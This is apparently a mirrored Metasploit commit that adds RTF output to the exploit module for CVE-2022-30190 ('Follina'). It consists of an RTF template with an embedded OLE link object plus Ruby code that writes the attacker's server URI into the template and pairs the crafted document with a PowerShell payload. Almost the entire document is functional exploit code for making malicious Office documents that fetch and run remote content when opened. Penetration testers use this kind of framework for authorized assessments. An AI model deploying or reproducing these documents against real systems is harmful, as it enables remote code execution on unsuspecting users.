mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Add rtf support to cve-2022-30190 AKA Follina
This commit is contained in:
parent
c7820048cd
commit
ef9f5ca463
30
data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf
Normal file
30
data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf
Normal file
@ -0,0 +1,30 @@
|
|||||||
|
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
|
||||||
|
\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
|
||||||
|
{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
|
||||||
|
{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
|
||||||
|
4f4c45324c696e6b000000000000000000000c0000
|
||||||
|
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
|
||||||
|
70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
|
||||||
|
00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
|
||||||
|
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
|
||||||
|
8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
|
||||||
|
0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
|
||||||
|
0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
||||||
|
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
|
||||||
|
}}}}
|
@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
include Msf::Exploit::FILEFORMAT
|
include Msf::Exploit::FILEFORMAT
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
include Msf::Post::File
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(
|
super(
|
||||||
@ -61,6 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
|
OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
|
||||||
|
OptEnum.new('OUTPUT_FORMAT', [true, 'Obfuscate JavaScript content.', 'docx', %w[docx rtf]]),
|
||||||
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
|
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
@ -174,27 +176,50 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||||||
Msf::Util::EXE.to_zip(@docx)
|
Msf::Util::EXE.to_zip(@docx)
|
||||||
end
|
end
|
||||||
|
|
||||||
def primer
|
def build_rtf
|
||||||
print_status('Generating a malicious docx file')
|
print_status('Generating a malicious rtf file')
|
||||||
|
|
||||||
@proto = (datastore['SSL'] ? 'https' : 'http')
|
uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
|
||||||
|
uri_space = 76
|
||||||
|
if uri.length > 76
|
||||||
|
fail_with(Failure::BadConfig, 'The total URI must be under 75 characters')
|
||||||
|
end
|
||||||
|
uri_ascii = uri.each_byte.map { |b| b.to_s(16) }.join
|
||||||
|
uri_ascii << '0' * ((uri_space * 2) - uri_ascii.length)
|
||||||
|
# This is terrible, but will work for a test
|
||||||
|
uri_utf16 = uri.each_byte.map { |b| '00' + b.to_s(16) }.join
|
||||||
|
uri_utf16 << '0' * ((uri_space * 4) - uri_utf16.length)
|
||||||
|
rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf')
|
||||||
|
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_ascii)
|
||||||
|
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16)
|
||||||
|
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri)
|
||||||
|
file_create(rtf_file_data)
|
||||||
|
end
|
||||||
|
|
||||||
|
def build_docx
|
||||||
|
print_status('Generating a malicious docx file')
|
||||||
|
|
||||||
template_path = get_template_path
|
template_path = get_template_path
|
||||||
unless File.extname(template_path).downcase.end_with?('.docx')
|
unless File.extname(template_path).downcase.end_with?('.docx')
|
||||||
fail_with(Failure::BadConfig, 'Template is not a docx file!')
|
fail_with(Failure::BadConfig, 'Template is not a docx file!')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Using template '#{template_path}'")
|
|
||||||
@docx = unpack_docx(template_path)
|
@docx = unpack_docx(template_path)
|
||||||
|
|
||||||
print_status('Injecting payload in docx document')
|
print_status('Injecting payload in docx document')
|
||||||
inject_docx
|
inject_docx
|
||||||
|
|
||||||
print_status("Finalizing docx '#{datastore['FILENAME']}'")
|
print_status("Finalizing docx '#{datastore['FILENAME']}'")
|
||||||
file_create(pack_docx)
|
file_create(pack_docx)
|
||||||
|
end
|
||||||
|
|
||||||
|
def primer
|
||||||
|
@proto = (datastore['SSL'] ? 'https' : 'http')
|
||||||
|
|
||||||
|
if datastore['OUTPUT_FORMAT'] == 'rtf'
|
||||||
|
build_rtf
|
||||||
|
else
|
||||||
|
build_docx
|
||||||
|
end
|
||||||
@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
|
@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
|
||||||
|
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user